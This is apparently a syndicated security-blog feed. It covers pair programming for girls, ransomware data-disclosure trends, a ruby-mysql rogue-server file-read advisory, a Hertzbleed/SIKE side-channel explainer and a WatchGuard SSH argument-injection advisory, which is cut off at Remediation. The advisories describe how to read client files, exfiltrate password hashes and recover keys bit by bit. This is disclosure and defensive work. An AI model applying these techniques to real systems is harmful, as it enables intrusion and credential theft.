“I do think that having that equal time to have a go at both, thinking of the girls I’ve got, will have helped my girls, because they lack a bit of confidence. They were learning very quickly that, ‘Actually, yes, we are sure. We can do this.’” — Primary teacher (report, p. 44)

“It might be easier to do pair programming [compared to ‘normal’ lessons] because if you’re stuck, your partner can be helpful.” — Female learner (report, p. 43)

Find out more about pair programming 

  • Download our Big Book of Computing Pedagogy a free PDF and read about pair programming on pages 58 and 59.
  • Watch this short video that shows pair programming being used in a primary classroom. 
  • Read the evaluation report of the pair programming intervention, where you’ll also find more quotes from teachers and learners.
  • Try the free training course on pair programming we designed and used for this project. It also includes links to the lesson plans that teachers worked with. 

Collaboration in our research

We will continue to publish evaluation reports and our reflections on the other projects in the Gender Balance in Computing programme. If you would like to stay up-to-date with the programme, you can sign up to the newsletter.

Two learners at a desktop computer doing coding.

The insights gained from this trial will feed forwards into our future work. Through the process of working with schools on this project, we have increased our understanding of the process of research in educational settings in many ways. We are very grateful for the input from teachers who took part in the first stage of the trial, with whom we developed an effective co-production model for developing resources, a model we will use in future research projects. Teachers who took part in the second stage of the project told us that the resources we provided were of good quality, which demonstrates the success of this co-production approach to developing resources. 

In our new Raspberry Pi Computing Education Research Centre, created with the University of Cambridge Department of Computer Science and Technology, we will collaborate closely with teachers and schools when implementing and evaluating research projects. You are invited to the free in-person launch event of the Centre on 20 July in Cambridge, UK, where we hope to meet many teachers, researchers, and other education practitioners to strengthen a collaborative community around computing education research.

References

[1] Goode, J., Estrella, R., & Margolis, J. (2018). Lost in Translation: Gender and High School Computer Science. In Women and Information Technology. https://doi.org/10.7551/mitpress/7272.003.0005

[2] Alexandria K. Hansen, Hilary A. Dwyer, Ashley Iveland, Mia Talesfore, Lacy Wright, Danielle B. Harlow, and Diana Franklin. 2017. Assessing Children’s Understanding of the Work of Computer Scientists: The Draw-a-Computer-Scientist Test. In Proceedings of the 2017 ACM SIGCSE Technical Symposium on Computer Science Education (SIGCSE ’17). Association for Computing Machinery, New York, NY, USA, 279–284. https://doi.org/10.1145/3017680.3017769

[3] Yasmin B. Kafai and Quinn Burke. 2013. The social turn in K-12 programming: moving from computational thinking to computational participation. In Proceeding of the 44th ACM technical symposium on Computer science education (SIGCSE ’13). Association for Computing Machinery, New York, NY, USA, 603–608. https://doi.org/10.1145/2445196.2445373

[4] Linda Werner & Jill Denning (2009) Pair Programming in Middle School, Journal of Research on Technology in Education, 42:1, 29-49. https://doi.org/10.1080/15391523.2009.10782540

[5] Charlie McDowell, Linda Werner, Heather E. Bullock, and Julian Fernald. 2006. Pair programming improves student retention, confidence, and program quality. Commun. ACM 49, 8 (August 2006), 90–95. https://doi.org/10.1145/1145287.1145293

[6] Denner, J., Werner, L., Campe, S., & Ortiz, E. (2014). Pair programming: Under what conditions is it advantageous for middle school students? Journal of Research on Technology in Education, 46(3), 277–296. https://doi.org/10.1080/15391523.2014.888272

[7] Maria Kallia and Sue Sentance. 2018. Are boys more confident than girls? the role of calibration and students’ self-efficacy in programming tasks and computer science. In Proceedings of the 13th Workshop in Primary and Secondary Computing Education (WiPSCE ’18). Association for Computing Machinery, New York, NY, USA, Article 16, 1–4. https://doi.org/10.1145/3265757.3265773

[8] Bandura, A. (1977). Self-efficacy: Toward a unifying theory of behavioral change. Psychological Review, 84(2), 191–215. https://doi.org/10.1037/0033-295X.84.2.191

[9] Allison Mishkin. 2019. Applying Self-Determination Theory towards Motivating Young Women in Computer Science. In Proceedings of the 50th ACM Technical Symposium on Computer Science Education (SIGCSE ’19). Association for Computing Machinery, New York, NY, USA, 1025–1031. https://doi.org/10.1145/3287324.3287389

The post A pair programming approach for engaging girls in the Computing classroom: Study results appeared first on Raspberry Pi.

For Ransomware Double-Extorters, It’s All About the Benjamins — and Data From Healthcare and Pharma

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/28/for-ransomware-double-extorters-its-all-about-the-benjamins-and-data-from-healthcare-and-pharma/

For Ransomware Double-Extorters, It's All About the Benjamins — and Data From Healthcare and Pharma

Welcome to the second installment in our series looking at the latest ransomware research from Rapid7. Two weeks ago, we launched “Pain Points: Ransomware Data Disclosure Trends”, our first-of-its-kind look into the practice of double extortion, what kinds of data get disclosed, and how the ransomware “market” has shifted in the two years since double extortion became a particularly nasty evolution to the practice.

Today, we’re going to talk a little more about the healthcare and pharmaceutical industry data and analysis from the report, highlighting how these two industries differ from some of the other hardest-hit industries and how they relate to each other (or don’t in some cases).

But first, let’s recap what “Pain Points” is actually analyzing. Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats and operationalizes that data automatically with our Threat Command product. This means we have at our disposal large amounts of data pertaining to ransomware double extortion that we were able to analyze to determine some interesting trends like never before. Check out the full paper for more detail, and view some well redacted real-world examples of data breaches while you’re at it.

For healthcare and pharma, the risks are heightened

When it comes to the healthcare and pharmaceutical industries, there are some notable similarities that set them apart from other verticals. For instance, internal finance and accounting files showed up most often in initial ransomware data disclosures for healthcare and pharma than for any other industry (71%), including financial services (where you would think financial information would be the most common).

After that, customer and patient data showed up more than 58% of the time — still very high, indicating that ransomware attackers value these data from these industries in particular. This is likely due to the relative amount of damage (legal and regulatory) these kinds of disclosures could have on such a highly regulated field (particularly healthcare).

For Ransomware Double-Extorters, It's All About the Benjamins — and Data From Healthcare and Pharma

All eyes on IP and patient data

Where the healthcare and pharmaceutical differed were in the prevalence of intellectual property (IP) disclosures. The healthcare industry focuses mostly on patients, so it makes sense that one of their biggest data disclosure areas would be personal information. But the pharma industry focuses much more on research and development than it does on the personal information of people. In pharma-related disclosures, IP made up 43% of all disclosures. Again, the predilection on the part of ransomware attackers to “hit ’em where it hurts the most” is on full display here.

Finally, different ransomware groups favor different types of data disclosures, as our data indicated. When it comes to the data most often disclosed from healthcare and pharma victims, REvil and Cl0p were the only who did it (10% and 20% respectively). For customer and patient data, REvil took the top spot with 55% of disclosures, with Darkside behind them at 50%. Conti and Cl0p followed with 42% and 40%, respectively.

So there you have it: When it comes to the healthcare and pharmaceutical industries, financial data, customer data, and intellectual property are the most frequently used data to impose double extortion on ransomware victims.

Ready to dive further into the data? Check out the full report.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/06/28/cve-2021-3779-ruby-mysql-gem-client-file-read-fixed/

CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

The ruby-mysql Ruby gem prior to version 2.10.0 maintained by Tomita Masahiro is vulnerable to an instance of CWE-610: Externally Controlled Reference to a Resource in Another Sphere, wherein a malicious MySQL server can request local file content from a client without explicit authorization from the user. The initial CVSSv3 estimate for this issue is 6.5. Note that this issue does not affect the much more popular mysql2 gem. This issue was fixed in ruby-mysql 2.10.0 on October 23, 2021, and users of ruby-mysql are urged to update.

Product description

The ruby-mysql Ruby gem is an implementation of a MySQL client. While it is far less popular than the mysql2 gem, it serves a particular niche audience of users that desire a pure Ruby implementation of MySQL client functionality without linking to an external library (as mysql2 does).

Credit

This issue was reported to Rapid7 by Hans-Martin Münch of MOGWAI LABS GmbH, initially as a Metasploit issue, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy after coordination with the upstream maintainer of this library, as well as JPCERT/CC and CERT/CC.

Exploitation

A malicious actor can read arbitrary files from a client that uses ruby-mysql to communicate to a rogue MySQL server and issue database queries. In these cases, the server has the option to create a database reply using the LOAD DATA LOCAL statement, which instructs the client to provide additional data from a local file readable by the client (and not a “local” file on the server). The easiest way to demonstrate this issue is to run an instance of Rogue-MySql-Server by Gifts and perform any database query using the vulnerable version of the mysql gem.

Note that this behavior is a defined and expected option for servers and is described in the documentation, quoted below:

Because LOAD DATA LOCAL is an SQL statement, parsing occurs on the server side, and transfer of the file from the client host to the server host is initiated by the MySQL server, which tells the client the file named in the statement. In theory, a patched server could tell the client program to transfer a file of the server’s choosing rather than the file named in the statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.) [emphasis added]

So, the vulnerability is not so much a MySQL server or protocol issue, but a vulnerability in a client that does not at least provide an option to disable LOAD DATA LOCAL queries; this is the situation with version 2.9.14 and earlier versions of ruby-mysql.

There is also prior work on this type of issue, and interested readers should refer to Knownsec 404 Team‘s article describing the issue for a thorough understanding of the dangers of LOAD DATA LOCAL and untrusted MySQL servers.

Impact

As stated, this issue only affects Ruby-based MySQL clients that connect to malicious MySQL servers. The vast majority of clients already know who they’re connecting to, and while an attacker could poison DNS records or otherwise intercede in network traffic to capture unwitting clients, such network shenanigans will be foiled by routine security controls like SSL certificates. The true risk is posed only to those people who connect to random and unknown MySQL servers in unfamiliar environments.

In other words, penetration testers and other opportunistic MySQL attackers are most at risk from this kind of vulnerability. CVE-2021-3779 fits squarely in the category of “hacking the hackers,” where an aggressive honeypot is designed to lie in wait for wandering MySQL scanners and attackers and steal data local to those connecting clients.

This is the reason why Hans-Martin Münch of MOGWAI LABS GmbH first brought this to Rapid7’s attention as an issue in Metasploit. While Metasploit users are indeed the most at risk to falling victim to an exploit for this vulnerability, the underlying issue was quickly identified as one in the shared open-source library code that Metasploit depends on for managing MySQL connections to remote servers. (One such example is the MySQL hashdump auxiliary module.)

Remediation

Users who implement ruby-mysql should update their packaged gem with the latest version of ruby-mysql, as it has been fixed in version 2.10.0. The current version (as of this writing) is 3.0.0 and was released in November of 2021.

Users unable to update can patch around the issue by ensuring that CLIENT_LOCAL_FILES is disallowed by the client, similarly to how Metasploit Framework initially remediated this issue while waiting on a fix from the upstream maintainer.

Disclosure timeline

The astute reader will note a significant gap of several months between the fix release and this disclosure. This was a failure on my, Tod Beardsley’s, part, since I was handling this issue.

For the record, there was no intention to bury this vulnerability — after all, we communicated it to the Tomita (the maintainer), RubyGems (who pointed us in the direction of Rubysec, thanks André), CERT/CC, and JPCERT/CC, so hopefully the intention to disclose in a timely manner was and is obvious.

But a confluence of family tragedies and home-office technical disasters conspired with the usual complications of a multi-stakeholder, multi-continent effort to coordinate disclosure in open-source library code.

I am also acutely aware of the irony of this delay in light of my recent post on silent patches, and I offer apologies for that delay. I am committed to being better with backups, both of the data and human varieties.

Note that all dates are local to the United States (some dates may differ in Japan and Germany depending on the time of day).

  • August, 2021: Issue discovered by Hans-Martin Münch of MOGWAI LABS GmbH.
  • Thu, Sep 2, 2021: Issue reported to Rapid7’s security contact as a Metasploit issue, #9286.
  • Tue, Sep 7, 2021: Rapid7 validated the issue, reserved CVE-2021-3779, and contacted the vulnerable gem maintainer, Tomita Masahiro.
  • Tue, Sep 8, 2021: Metasploit Framework temporary remediation committed.
  • Tue, Sep 8, 2021: Notified CERT/CC and RubyGems for disclosure coordination, as the gem appeared to be abandoned by the maintainer given no updates in several years.
  • Tue, Sep 9, 2021: Notified JPCERT/CC through VINCE on CERT/CC’s advice, as VU#541053.
  • Thu, Sep 10, 2021: JPCERT/CC acknowledged the issue and attempted to contact the gem maintainer.
  • Mon, Oct 18, 2021: Maintainer responded to JPCERT/CC, acknowledging the issue.
  • Fri, Oct 22, 2021: Fixed version 2.10.0 released, Rapid7 notified Hans-Martin of the fix.
  • Wed, Feb 16, 2022: CERT/CC asks for an update on the issue, Rapid7 communicates the fix to CERT/CC and JPCERT/CC.
  • Tue, Jun 6, 2022: CERT/CC asks for an update, Rapid7 commits to sharing disclosure documentation.
  • Tue, Jun 14, 2022: Rapid7 shares disclosure details with CERT/CC and Hans-Martin, and asks JPCERT/CC to communicate this document to Tomita.
  • Tue, June 28, 2022: This public disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Hertzbleed explained

Post Syndicated from Yingchen Wang original https://blog.cloudflare.com/hertzbleed-explained/

Hertzbleed explained

Hertzbleed explained

You may have heard a bit about the Hertzbleed attack that was recently disclosed. Fortunately, one of the student researchers who was part of the team that discovered this vulnerability and developed the attack is spending this summer with Cloudflare Research and can help us understand it better.

The first thing to note is that Hertzbleed is a new type of side-channel attack that relies on changes in CPU frequency. Hertzbleed is a real, and practical, threat to the security of cryptographic software.

Should I be worried?

From the Hertzbleed website,

“If you are an ordinary user and not a cryptography engineer, probably not: you don’t need to apply a patch or change any configurations right now. If you are a cryptography engineer, read on. Also, if you are running a SIKE decapsulation server, make sure to deploy the mitigation described below.”

Notice: As of today, there is no known attack that uses Hertzbleed to target conventional and standardized cryptography, such as the encryption used in Cloudflare products and services. Having said that, let’s get into the details of processor frequency scaling to understand the core of this vulnerability.

In short, the Hertzbleed attack shows that, under certain circumstances, dynamic voltage and frequency scaling (DVFS), a power management scheme of modern x86 processors, depends on the data being processed. This means that on modern processors, the same program can run at different CPU frequencies (and therefore take different wall-clock times). For example, we expect that a CPU takes the same amount of time to perform the following two operations because it uses the same algorithm for both. However, there is an observable time difference between them:

Hertzbleed explained

Trivia: Could you guess which operation runs faster?

Before giving the answer we will explain some details about how Hertzbleed works and its impact on SIKE, a new cryptographic algorithm designed to be computationally infeasible for an adversary to break, even for an attacker with a quantum computer.

Frequency Scaling

Suppose a runner is in a long distance race. To optimize the performance, the heart monitors the body all the time. Depending on the input (such as distance or oxygen absorption), it releases the appropriate hormones that will accelerate or slow down the heart rate, and as a result tells the runner to speed up or slow down a little. Just like the heart of a runner, DVFS (dynamic voltage and frequency scaling) is a monitor system for the CPU. It helps the CPU to run at its best under present conditions without being overloaded.

Hertzbleed explained

Just as a runner’s heart causes a runner’s pace to fluctuate throughout a race depending on the level of exertion, when a CPU is running a sustained workload, DVFS modifies the CPU’s frequency from the so-called steady-state frequency. DVFS causes it to switch among multiple performance levels (called P-states) and oscillate among them. Modern DVFS gives the hardware almost full control to adjust the P-states it wants to execute in and the duration it stays at any P-state. These modifications are totally opaque to the user, since they are controlled by hardware and the operating system provides limited visibility and control to the end-user.

The ACPI specification defines P0 state as the state the CPU runs at its maximum performance capability. Moving to higher P-states makes the CPU less performant in favor of consuming less energy and power.

Hertzbleed explained
Suppose a CPU’s steady-state frequency is 4.0 GHz. Under DVFS, frequency can oscillate between 3.9-4.1 GHz.

How long does the CPU stay at each P-state? Most importantly, how can this even lead to a vulnerability? Excellent questions!

Modern DVFS is designed this way because CPUs have a Thermal Design Point (TDP), indicating the expected power consumption at steady state under a sustained workload. For a typical computer desktop processor, such as a Core i7-8700, the TDP is 65 W.

To continue our human running analogy: a typical person can sprint only short distances, and must run longer distances at a slower pace. When the workload is of short duration, DVFS allows the CPU to enter a high-performance state, called Turbo Boost on Intel processors. In this mode, the CPU can temporarily execute very quickly while consuming much more power than TDP allows. But when running a sustained workload, the CPU average power consumption should stay below TDP to prevent overheating. For example, as illustrated below, suppose the CPU has been free of any task for a while, the CPU runs extra hard (Turbo Boost on) when it just starts running the workload. After a while, it realizes that this workload is not a short one, so it slows down and enters steady-state. How much does it slow down? That depends on the TDP. When entering steady-state, the CPU runs at a certain speed such that its current power consumption is not above TDP.

Hertzbleed explained
CPU entering steady state after running at a higher frequency.

Beyond protecting CPUs from overheating, DVFS also wants to maximize the performance. When a runner is in a marathon, she doesn’t run at a fixed pace but rather her pace floats up and down a little. Remember the P-state we mentioned above? CPUs oscillate between P-states just like runners adjust their pace slightly over time. P-states are CPU frequency levels with discrete increments of 100 MHz.

Hertzbleed explained
CPU frequency levels with discrete increments

The CPU can safely run at a high P-state (low frequency) all the time to stay below TDP, but there might be room between its power consumption and the TDP. To maximize CPU performance, DVFS utilizes this gap by allowing the CPU to oscillate between multiple P-states. The CPU stays at each P-state for only dozens of milliseconds, so that its temporary power consumption might exceed or fall below TDP a little, but its average power consumption is equal to TDP.

To understand this, check out this figure again.

Hertzbleed explained

If the CPU only wants to protect itself from overheating, it can run at P-state 3.9 GHz safely. However, DVFS wants to maximize the CPU performance by utilizing all available power allowed by TDP. As a result, the CPU oscillates around the P-state 4.0 GHz. It is never far above or below. When at 4.1 GHz, it overloads itself a little, it then drops to a higher P-state. When at 3.9 GHz, it recovers itself, it quickly climbs to a lower P-state. It may not stay long in any P-state, which avoids overheating when at 4.1 GHz and keeps the average power consumption near the TDP.

This is exactly how modern DVFS monitors your CPU to help it optimize power consumption while working hard.

Again, how can DVFS and TDP lead to a vulnerability? We are almost there!

Frequency Scaling vulnerability

The design of DVFS and TDP can be problematic because CPU power consumption is data-dependent! The Hertzbleed paper gives an explicit leakage model of certain operations identifying two cases.

First, the larger the number of bits set (also known as the Hamming weight) in the operands, the more power an operation takes. The Hamming weight effect is widely observed with no known explanation of its root cause. For example,

Hertzbleed explained

The addition on the left will consume more power compared to the one on the right.

Similarly, when registers change their value there are power variations due to transistor switching. For example, a register switching its value from A to B (as shown in the left) requires flipping only one bit because the Hamming distance of A and B is 1. Meanwhile, switching from C to D will consume more energy to perform six bit transitions since the Hamming distance between C and D is 6.

Hertzbleed explained
Hamming distance

Now we see where the vulnerability is! When running sustained workloads, CPU overall performance is capped by TDP. Under modern DVFS, it maximizes its performance by oscillating between multiple P-states. At the same time, the CPU power consumption is data-dependent. Inevitably, workloads with different power consumption will lead to different CPU P-state distribution. For example, if workload w1 consumes less power than workload w2, the CPU will stay longer in lower P-state (higher frequency) when running w1.

Hertzbleed explained
Different power consumption leads to different P-state distribution

As a result, since the power consumption is data-dependent, it follows that CPU frequency adjustments (the distribution of P-states) and execution time (as 1 Hertz = 1 cycle per second) are data-dependent too.

Consider a program that takes five cycles to finish as depicted in the following figure.

Hertzbleed explained
CPU frequency directly translate to running time

As illustrated in the table below, f the program with input 1 runs at 4.0 GHz (red) then it takes 1.25 nanoseconds to finish. If the program consumes more power with input 2, under DVFS, it will run at a lower frequency, 3.5 GHz (blue). It takes more time, 1.43 nanoseconds, to finish. If the program consumes even more power with input 3, under DVFS, it will run at an even lower frequency of 3.0 GHz (purple). Now it takes 1.67 nanoseconds to finish. This program always takes five cycles to finish, but the amount of power it consumes depends on the input. The power influences the CPU frequency, and CPU frequency directly translates to execution time. In the end, the program’s execution time becomes data-dependent.

Execution time of a five cycles program
Frequency 4.0 GHz 3.5 GHz 3.0 GHz
Execution Time 1.25 ns 1.43 ns 1.67 ns

To give you another concrete example: Suppose we have a sustained workload Foo. We know that Foo consumes more power with input data 1, and less power with input data 2. As shown on the left in the figure below, if the power consumption of Foo is below the TDP, CPU frequency as well as running time stays the same regardless of the choice of input data. However, as shown in the middle, if we add a background stressor to the CPU, the combined power consumption will exceed TDP. Now we are in trouble. CPU overall performance is monitored by DVFS and capped by TDP. To prevent itself from overheating, it dynamically adjusts its P-state distribution when running workload with various power consumption. P-state distribution of Foo(data 1) will have a slight right shift compared to that of Foo(data 2). As shown on the right, CPU running Foo(data 1) results in a lower overall frequency and longer running time. The observation here is that, if data is a binary secret, an attacker can infer data by simply measuring the running time of Foo!

Hertzbleed explained
Complete recap of Hertzbleed. Figure taken from Intel’s documentation.

This observation is astonishing because it conflicts with our expectation of a CPU. We expect a CPU to take the same amount of time computing these two additions.

Hertzbleed explained

However, Hertzbleed tells us that just like a person doing math on paper, a CPU not only takes more power to compute more complicated numbers but also spends more time as well! This is not what a CPU should do while performing a secure computation! Because anyone that measures the CPU execution time should not be able to infer the data being computed on.

This takeaway of Hertzbleed creates a significant problem for cryptography implementations because an attacker shouldn’t be able to infer a secret from program’s running time. When developers implement a cryptographic protocol out of mathematical construction, a goal in common is to ensure constant-time execution. That is, code execution does not leak secret information via a timing channel. We have witnessed that timing attacks are practical: notable examples are those shown by Kocher, Brumley-Boneh, Lucky13, and many others. How to properly implement constant-time code is subject of extensive study.

Historically, our understanding of which operations contribute to time variation did not take DVFS into account. The Hertzbleed vulnerability derives from this oversight: any workload which differs by significant power consumption will also differ in timing. Hertzbleed proposes a new perspective on the development of secure programs: any program vulnerable to power analysis becomes potentially vulnerable to timing analysis!

Which cryptographic algorithms are vulnerable to Hertzbleed is unclear. According to the authors, a systematic study of Hertzbleed is left as future work. However, Hertzbleed was exemplified as a vector for attacking SIKE.

Brief description of SIKE

The Supersingular Isogeny Key Encapsulation (SIKE) protocol is a Key Encapsulation Mechanism (KEM) finalist of the NIST Post-Quantum Cryptography competition (currently at Round 3). The building block operation of SIKE is the calculation of isogenies (transformations) between elliptic curves. You can find helpful information about the calculation of isogenies in our previous blog post. In essence, calculating isogenies amounts to evaluating mathematical formulas that take as inputs points on an elliptic curve and produce other different points lying on a different elliptic curve.

Hertzbleed explained

SIKE bases its security on the difficulty of computing a relationship between two elliptic curves. On the one hand, it’s easy computing this relation (called an isogeny) if the points that generate such isogeny (called the kernel of the isogeny) are known in advance. On the other hand, it’s difficult to know the isogeny given only two elliptic curves, but without knowledge of the kernel points. An attacker has no advantage if the number of possible kernel points to try is large enough to make the search infeasible (computationally intractable) even with the help of a quantum computer.

Similarly to other algorithms based on elliptic curves, such as ECDSA or ECDH, the core of SIKE is calculating operations over points on elliptic curves. As usual, points are represented by a pair of coordinates (x,y) which fulfill the elliptic curve equation

$ y^2= x^3 + Ax^2 +x $

where A is a parameter identifying different elliptic curves.

For performance reasons, SIKE uses one of the fastest elliptic curve models: the Montgomery curves. The special property that makes these curves fast is that it allows working only with the x-coordinate of points. Hence, one can express the x-coordinate as a fraction x = X / Z, without using the y-coordinate at all. This representation simplifies the calculation of point additions, scalar multiplications, and isogenies between curves. Nonetheless, such simplicity does not come for free, and there is a price to be paid.

The formulas for point operations using Montgomery curves have some edge cases. More technically, a formula is said to be complete if for any valid input a valid output point is produced. Otherwise, a formula is not complete, meaning that there are some exceptional inputs for which it cannot produce a valid output point.

Hertzbleed explained

In practice, algorithms working with incomplete formulas must be designed in such a way that edge cases never occur. Otherwise, algorithms could trigger some undesired effects. Let’s take a closer look at what happens in this situation.

A subtle yet relevant property of some incomplete formulas is the nature of the output they produce when operating on points in the exceptional set. Operating with anomalous inputs, the output has both coordinates equal to zero, so X=0 and Z=0. If we recall our basics on fractions, we can figure out that there is something odd in a fraction X/Z = 0/0; furthermore it was always regarded as something not well-defined. This intuition is not wrong, something bad just happened. This fraction does not represent a valid point on the curve. In fact, it is not even a (projective) point.

The domino effect

Hertzbleed explained

Exploiting this subtlety of mathematical formulas makes a case for the Hertzbleed side-channel attack. In SIKE, whenever an edge case occurs at some point in the middle of its execution, it produces a domino effect that propagates the zero coordinates to subsequent computations, which means the whole algorithm is stuck on 0. As a result, the computation gets corrupted obtaining a zero at the end, but what is worse is that an attacker can use this domino effect to make guesses on the bits of secret keys.

Trying to guess one bit of the key requires the attacker to be able to trigger an exceptional case exactly at the point in which the bit is used. It looks like the attacker needs to be super lucky to trigger edge cases when it only has control of the input points. Fortunately for the attacker, the internal algorithm used in SIKE has some invariants that can help to hand-craft points in such a way that triggers an exceptional case exactly at the right point. A systematic study of all exceptional points and edge cases was, independently, shown by De Feo et al. as well as in the Hertzbleed article.

With these tools at hand, and using the DVFS side channel, the attacker can now guess bit-by-bit the secret key by passing hand-crafted invalid input points. There are two cases an attacker can observe when the SIKE algorithm uses the secret key:

  • If the bit of interest is equal to the one before it, no edge cases are present and computation proceeds normally, and the program will take the expected amount of wall-time since all the calculations are performed over random-looking data.
  • On the other hand, if the bit of interest is different from the one before it, the algorithm will enter the exceptional case, triggering the domino effect for the rest of the computation, and the DVFS will make the program run faster as it automatically changes the CPU’s frequency.

Using this oracle, the attacker can query it, learning bit by bit the secret key used in SIKE.

Ok, let’s recap.

SIKE uses special formulas to speed up operations, but if these formulas are forced to hit certain edge cases then they will fail. Failing due to these edge cases not only corrupts the computation, but also makes the formulas output coordinates with zeros, which in machine representation amount to several registers all loaded with zeros. If the computation continues without noticing the presence of these edge cases, then the processor registers will be stuck on 0 for the rest of the computation. Finally, at the hardware level, some instructions can consume fewer resources if operands are zeroed. Because of that, the DVFS behind CPU power consumption can modify the CPU frequency, which alters the steady-state frequency. The ultimate result is a program that runs faster or slower depending on whether it operates with all zeros versus with random-looking data.

Hertzbleed explained

Hertzbleed’s authors contacted Cloudflare Research because they showed a successful attack on CIRCL, our optimized Go cryptographic library that includes SIKE. We worked closely with the authors to find potential mitigations in the early stages of their research. While the embargo of the disclosure was in effect, another research group including De Feo et al. independently described a systematic study of the possible failures of SIKE formulas, including the same attack found by the Hertzbleed team, and pointed to a proper countermeasure. Hertzbleed borrows such a countermeasure.

What countermeasures are available for SIKE?

Hertzbleed explained

The immediate action specific for SIKE is to prevent edge cases from occurring in the first place. Most SIKE implementations provide a certain amount of leeway, assuming that inputs will not trigger exceptional cases. This is not a safe assumption. Instead, implementations should be hardened and should validate that inputs and keys are well-formed.

Enforcing a strict validation of untrusted inputs is always the recommended action. For example, a common check on elliptic curve-based algorithms is to validate that inputs correspond to points on the curve and that their coordinates are in the proper range from 0 to p-1 (as described in Section 3.2.2.1 of SEC 1). These checks also apply to SIKE, but they are not sufficient.

What malformed inputs have in common in the case of SIKE is that input points could have arbitrary order—that is, in addition to checking that points must lie on the curve, they must also have a prescribed order, so they are valid. This is akin to small subgroup attacks for the Diffie-Hellman case using finite fields. In SIKE, there are several overlapping groups in the same curve, and input points having incorrect order should be detected.

The countermeasure, originally proposed by Costello, et al., consists of verifying whether the input points are of the right full-order. To do so, we check whether an input point vanishes only when multiplied by its expected order, and not before when multiplied by smaller scalars. By doing so, the hand-crafted invalid points will not pass this validation routine, which prevents edge cases from appearing during the algorithm execution. In practice, we observed around a 5-10% performance overhead on SIKE decapsulation. The ciphertext validation is already available in CIRCL as of version v1.2.0. We strongly recommend updating your projects that depend on CIRCL to this version, so you can make sure that strict validation on SIKE is in place.

Hertzbleed explained

Closing comments

Hertzbleed shows that certain workloads can induce changes on the frequency scaling of the processor, making programs run faster or slower. In this setting, small differences on the bit pattern of data result in observable differences on execution time. This puts a spotlight on the state-of-the-art techniques we know so far used to protect against timing attacks, and makes us rethink the measures needed to produce constant-time code and secure implementations. Defending against features like DVFS seems to be something that programmers should start to consider too.

Although SIKE was the victim this time, it is possible that other cryptographic algorithms may expose similar symptoms that can be leveraged by Hertzbleed. An investigation of other targets with this brand-new tool in the attacker’s portfolio remains an open problem.

Hertzbleed allowed us to learn more about how the machines we have in front of us work and how the processor constantly monitors itself, optimizing the performance of the system. Hardware manufacturers have focused on performance of processors by providing many optimizations, however, further study of the security of computations is also needed.

If you are excited about this project, at Cloudflare we are working on raising the bar on the production of code for cryptography. Reach out to us if you are interested in high-assurance tools for developers, and don’t forget our outreach programs whether you are a student, a faculty member, or an independent researcher.

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/06/23/cve-2022-31749-watchguard-authenticated-arbitrary-file-read-write-fixed/

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

A remote and low-privileged WatchGuard Firebox or XTM user can read arbitrary system files when using the SSH interface due to an argument injection vulnerability affecting the diagnose command. Additionally, a remote and highly privileged user can write arbitrary system files when using the SSH interface due to an argument injection affecting the import pac command. Rapid7 reported these issues to WatchGuard, and the vulnerabilities were assigned CVE-2022-31749. On June 23, Watchguard published an advisory and released patches in Fireware OS 12.8.1, 12.5.10, and 12.1.4.

Background

WatchGuard Firebox and XTM appliances are firewall and VPN solutions ranging in form factor from tabletop, rack mounted, virtualized, and “rugged” ICS designs. The appliances share a common underlying operating system named Fireware OS.

At the time of writing, there are more than 25,000 WatchGuard appliances with their HTTP interface discoverable on Shodan. There are more than 9,000 WatchGuard appliances exposing their SSH interface.

In February 2022, GreyNoise and CISA published details of WatchGuard appliances vulnerable to CVE-2022-26318 being exploited in the wild. Rapid7 discovered CVE-2022-31749 while analyzing the WatchGuard XTM appliance for the writeup of CVE-2022-26318 on AttackerKB.

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vulnerability details

CVE-2022-31749 is an argument injection into the ftpput and ftpget commands. The arguments are injected when the SSH CLI prompts the attacker for a username and password when using the diagnose or import pac commands. For example:

WG>diagnose to ftp://test/test
Name: username
Password: 

The “Name” and “Password” values are not sanitized before they are combined into the “ftpput” and “ftpget” commands and executed via librmisvc.so. Execution occurs using execle, so command injection isn’t possible, but argument injection is. Using this injection, an attacker can upload and download arbitrary files.

File writing turns out to be less useful than an attacker would hope. The problem, from an attacker point of view, is that WatchGuard has locked down much of the file system, and the user can only modify a few directories: /tmp/, /pending/, and /var/run. At the time of writing, we don’t see a way to escalate the file write into code execution, though we wouldn’t rule it out as a possibility.

The low-privileged user file read is interesting because WatchGuard has a built-in low-privileged user named status. This user is intended to “read-only” access to the system. In fact, historically speaking, the default password for this user was “readonly”. Using CVE-2022-31749 this low-privileged user can exfiltrate the configd-hash.xml file, which contains user password hashes when Firebox-DB is in use. Example:

<?xml version="1.0"?>
<users>
  <version>3</version>
  <user name="admin">
    <enabled>1</enabled>
    <hash>628427e87df42adc7e75d2dd5c14b170</hash>
    <domain>Firebox-DB</domain>
    <role>Device Administrator</role>
  </user>
  <user name="status">
    <enabled>1</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
  <user name="wg-support">
    <enabled>0</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
</users>

The hashes are just unsalted MD4 hashes. @funoverip wrote about cracking these weak hashes using Hashcat all the way back in 2013.

Exploitation

Rapid7 has published a proof of concept that exfiltrates the configd-hash.xml file via the diagnose command. The following video demonstrates its use against WatchGuard XTMv 12.1.3 Update 8.



CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Remediation

